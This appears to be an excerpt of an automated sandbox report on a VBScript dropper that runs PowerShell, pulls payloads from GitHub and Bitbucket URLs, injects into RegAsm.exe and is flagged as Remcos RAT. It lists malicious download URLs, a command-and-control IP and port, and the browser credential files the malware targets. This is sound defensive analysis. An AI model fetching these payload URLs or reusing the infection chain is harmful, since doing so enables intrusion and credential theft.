                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00401D6F GetLocalTime,CreateEventA,CreateThread,13_2_00401D6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00413CEA CreateThread,GetComputerNameExW,GetUserNameW,13_2_00413CEA
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_00407EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_00407FDE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db13_2_00407FDE

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JX5AIBJump to behavior
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe13_2_00403B0B
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts11
                  Windows Management Instrumentation
                  221
                  Scripting
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  Account Discovery
                  Remote Desktop Protocol3
                  Clipboard Data
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  1
                  Windows Service
                  1
                  Windows Service
                  1
                  Software Packing
                  Security Account Manager1
                  System Service Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  Command and Scripting Interpreter
                  Login Hook211
                  Process Injection
                  1
                  DLL Side-Loading
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  Service Execution
                  Network Logon ScriptNetwork Logon Script31
                  Virtualization/Sandbox Evasion
                  LSA Secrets34
                  System Information Discovery
                  SSHKeylogging1
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media2
                  PowerShell
                  RC ScriptsRC Scripts1
                  Access Token Manipulation
                  Cached Domain Credentials31
                  Security Software Discovery
                  VNCGUI Input Capture12
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                  Process Injection
                  DCSync31
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540845 Sample: scan_doc20241024.vbs Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 28 Suricata IDS alerts for network traffic 2->28 30 Found malware configuration 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 12 other signatures 2->34 8 wscript.exe 1 2->8         started        process3 signatures4 44 VBScript performs obfuscated calls to suspicious functions 8->44 46 Suspicious powershell command line found 8->46 48 Wscript starts Powershell (via cmd or directly) 8->48 50 2 other signatures 8->50 11 powershell.exe 7 8->11         started        process5 signatures6 52 Suspicious powershell command line found 11->52 54 Suspicious execution chain found 11->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 11->56 14 powershell.exe 14 25 11->14         started        18 conhost.exe 11->18         started        process7 dnsIp8 26 185.199.108.133, 443, 49699, 49701 FASTLYUS Netherlands 14->26 58 Writes to foreign memory regions 14->58 60 Injects a PE file into a foreign processes 14->60 62 Loading BitLocker PowerShell Module 14->62 20 RegAsm.exe 2 14->20         started        signatures9 process10 dnsIp11 24 154.216.18.51, 2404, 49712, 49761 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 20->24 36 Detected Remcos RAT 20->36 38 Contains functionalty to change the wallpaper 20->38 40 Contains functionality to steal Chrome passwords or cookies 20->40 42 2 other signatures 20->42 signatures12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  scan_doc20241024.vbs18%VirustotalBrowse
                  scan_doc20241024.vbs16%ReversingLabsWin32.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore60%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723true
                    unknown
                    https://raw.githubusercontent.com/IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txttrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpRegAsm.exefalse
                      • URL Reputation: safe
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://raw.githubusercontent.compowershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmptrue
                        unknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            https://go.micropowershell.exe, 00000006.00000002.1420244282.000001CFD5785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000006.00000002.1420244282.000001CFD540A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD53E4000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://aka.ms/pscore6powershell.exe, 00000002.00000002.1731133022.000001ECDAD8D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1731133022.000001ECDADDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1731133022.000001ECDAE0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                185.199.108.133
                                unknownNetherlands
                                54113FASTLYUStrue
                                154.216.18.51
                                unknownSeychelles
                                135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1540845
                                Start date and time:2024-10-24 08:45:57 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 50s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:19
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:scan_doc20241024.vbs
                                Detection:MAL
                                Classification:mal100.rans.spre.troj.spyw.expl.evad.winVBS@8/7@0/2
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 26
                                • Number of non-executed functions: 152
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, raw.githubusercontent.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 4872 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                TimeTypeDescription
                                02:46:54API Interceptor46x Sleep call for process: powershell.exe modified
                                04:36:54API Interceptor1264616x Sleep call for process: RegAsm.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                gaber.ps1Get hashmaliciousUnknownBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                SKHT-ASShenzhenKatherineHengTechnologyInformationCompsl.elfGet hashmaliciousMirai, OkiruBrowse
                                • 154.216.19.102
                                mips.elfGet hashmaliciousMirai, OkiruBrowse
                                • 154.216.19.102
                                x86.elfGet hashmaliciousOkiruBrowse
                                • 154.216.19.102
                                fqF93rYI4Y.exeGet hashmaliciousXWormBrowse
                                • 154.216.18.238
                                POX455U90897QD.exeGet hashmaliciousXWormBrowse
                                • 154.216.18.238
                                l6G93s9XLN.elfGet hashmaliciousMiraiBrowse
                                • 156.241.11.56
                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                • 154.216.18.214
                                Order.vbsGet hashmaliciousRemcosBrowse
                                • 154.216.17.141
                                bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                • 154.216.17.159
                                bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 154.216.17.159
                                FASTLYUSFedEx Shipping Document_pdf.htmlGet hashmaliciousUnknownBrowse
                                • 199.232.196.193
                                Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.194.137
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.65.91
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.65.91
                                RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.2.137
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.129.91
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.193.91
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.1.91
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 151.101.65.91
                                http://jedox-couriers.com/5g/domain.php/domain..html?#infoland@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.66.137
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eRFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 185.199.108.133
                                FedEx Shipping Document_pdf.htmlGet hashmaliciousUnknownBrowse
                                • 185.199.108.133
                                Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                • 185.199.108.133
                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 185.199.108.133
                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 185.199.108.133
                                Douglas County Government.pdfGet hashmaliciousHtmlDropperBrowse
                                • 185.199.108.133
                                https://t.ly/2jKWOGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                • 185.199.108.133
                                http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                • 185.199.108.133
                                Play_VM.Now.matt.sibilo_Audio.wav...v.htmlGet hashmaliciousHtmlDropperBrowse
                                • 185.199.108.133
                                https://dca13.z4.web.core.windows.net/werrx01USAHTML/?bcda=1-877-883-8072#Get hashmaliciousTechSupportScamBrowse
                                • 185.199.108.133
                                No context
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulx51ll/h:NllU
                                MD5:4293FEE5C8B10DA4F196BB8D3E9677AB
                                SHA1:24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
                                SHA-256:95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
                                SHA-512:262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
                                Malicious:false
                                Reputation:low
                                Preview:@...e................................. ..............@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
